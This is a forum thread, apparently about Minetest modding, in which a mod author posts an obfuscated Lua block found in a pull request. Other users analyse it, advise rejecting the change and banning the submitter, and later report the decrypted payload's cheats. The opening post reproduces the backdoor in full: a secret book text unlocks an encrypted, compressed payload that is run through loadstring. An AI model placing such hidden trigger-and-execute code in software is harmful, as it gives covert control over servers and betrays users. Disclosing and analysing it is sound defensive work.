Suspicious block of code in a mod pull request

[joe7575]

I found this code block in a PR in one of my mods:

Code: Select all

    if stack:get_name() == "default:book_written" then
        local key = stack:get_meta():get_string("text")
        local hash = minetest.get_password_hash("key", key)
        if hash == "ERV14RNotIbIPklZ5f2gQtAKDNc" then
            local code = minetest.decode_base64("hWRHSF8RDYiS7Ag6gicCA0iTYc3" ..
                "fUV3sQZB2VZ4FLXefGb0uunYrbuTScPazwl/SDNwaj1a0MrFhlNywzkwviv" ..
                "mrbM3jc1aU3ENI9NOTC4zQQBBjb8VKaE0sKfZ555rG1fceGwvOGicisERE2" ..
                "ByiMo64edZSMEzoicd2/mTHb+/kfM9RNza88IVwxsiMjQValdrnkesxlbea" ..
                "AW3EznWX9Y9ESDNKDUQlcg")
            code = {code:byte(1, #code)}
            local pr = PcgRandom(tonumber(key))
            for i = 1, #code do
                code[i] = (code[i] + pr:next(0, 255)) % 256
            end
            code = minetest.decompress(string.char(unpack(code)), "deflate")
            loadstring(code)()(player)
        end
    end

Any ideas what that is for?

[Krock]

The "key" parameter makes it a password-protected binary blob. Who knows what's inside this compressed thing, but "loadstring" definitely sounds dangerous, even if it only takes the players as argument.

[joe7575]

But this can be used, e. g. to give the player server privs...

[rubenwardy]

This is dodgy asf, just reject the PR

[Astrobe]

Yes, basically if a player writes a specific text in a book, it triggers the decryption of what's encoded in the "code" string, and the book's text is also the key to decrypt it.

Basically only the author knows how to pull the trigger and what it does. The PcgRandom thing looks like a pseudo one-time-pad encryption scheme. It tells us however that the book's text must be convertible to a number.

So if you are curious, you can try to feed numbers to get_password_hash() until you get the hash the that the blocks look for. Depending how many hashes your hardware can compute per second, and perhaps with some heuristics (dictionaries, birthdates, ...) to restrict the search space this could be cracked.

Or if you can pretend this landed on a server but actually put a different version, you can log the result (or just the key, the code could be some kind of "zip bomb" too) instead of loadstring'ing it.

[joe7575]

How can you warn other modders of such attacks, or which mods could also be affected?

[Astrobe]

Probably look for loadstring() and similar functions. As Lua is used in a lot of games (among other less serious uses, no jk because real-time multiplayer 3D games are more demanding than many applications), tools probably already exist for generic Lua "backdoors". Perhaps the Minetest API introduces other opportunities, though.

[DELTA_FORCE]

Here's a trick you should use in any PR: if the code isn't readable, reject it. If it is questionable, reject it. Doesn't matter if it works. There is no reason anyone would write something this obfuscated for any function in a Minetest mod.

[ShadMOrdre]

It's most likely possible to have this value simply dumped to a text string. As long as the resultant code isn't ran through loadstring, there shouldn't be an issue.

I suppose I'd be willing to do so, and report the results here.

Shad

[Mantar]

Shad: true, but you first have to bruteforce the key. My guess is Joe7575 is right, this is a backdoor that lets the author give himself admin privs on the server. It could be any arbitrary lua function hidden in that "code" variable, but I can't imagine what else you'd want to do to your player character where you'd want a personal backdoor.
If you got banned you could come back under any alias, write the key in a book, and get admin privs immediately.

I'd reject anything obfuscated like this out of hand, and tell the submitter to explain himself or take a hike, because if he doesn't come clean, nothing he submits is ever going in after this.

[Lone_Wolf]

They key was found, see the GH thread

[ShadMOrdre]

Yes. I realize that I am still learning a few things. :)

Of course, obfuscated code should always be rejected.

I do wonder if someone has found a vulnerability within the engine code, possibly within the sql database code.

Understanding how the engine exposes to the lua api, privileges, hash functions, and how they work together, someone can reverse engineer the engine logic of these functions and then implement a lua workaround.

There should be better safeguards against any part of the Lua API being able to circumvent any part of the engine.


Shad

[rubenwardy]

https://github.com/joe7575/techage/pull/71

[Astrobe]

All this to get 99 mese and loaded dice? It's almost cute.

[runs]

The first Minetest VIRUS!!!!

I get my popcorn and sit down.

[Astrobe]

FWIW, I confirm that the key given by Savilli on Github actually gives the hash written in the code.

[Eris]

Ah yes, lets risk my whole Minetest reputation by posting malware... to cheat on a server.

[L-Dog]

Ah yes, lets risk my whole Minetest reputation by posting malware... to cheat on a server.

is there a Table of all the prizes from it?

.. in any case.... its not worth adding.. Easter Egg thing? .. not even Easter, and even if it was, i doubt players will wanna smash numbers into a book

its hard enough getting players to understand the HP_Upgrade_Packs

[Blockhead]

Also, why bother modifying the random number generator when the seed is provided to every client on a server and it's well-known that you can X-ray in the engine?

[Linuxdirk]

This is dodgy asf, just reject the PR

Also: Ban the user from your repository.

[joe7575]

Also, why bother modifying the random number generator when the seed is provided to every client on a server and it's well-known that you can X-ray in the engine?

`math. random` is used for many reasons in techage and other mods and thus indirectly also used by many players on a server. This means that a prediction of the next number is hardly possible.
But if your own `math. random` is used, which is restarted over and over again via an ingame mechanism, the same series of numbers appears over and over again. This can then be more easily exploited.

But that doesn't really make sense and the 99 mese are peanuts. I don't understand the reason behind it

[rubenwardy]

Also: Ban the user from your repository.

I'd definitely recommend doing this, you can't trust them

[joe7575]

I did, thanks

[Astrobe]

But that doesn't really make sense and the 99 mese are peanuts. I don't understand the reason behind it

Maybe it serves as a clue that the key was accepted. The guy was probably hoping that his hack would spread among the servers using your mods, but as they have no access to which version of your mod is on a server, they had to have an hint that it is "their" version.

[jordan4ibanez]

Oh a payload, didn't expect to ever see that in the game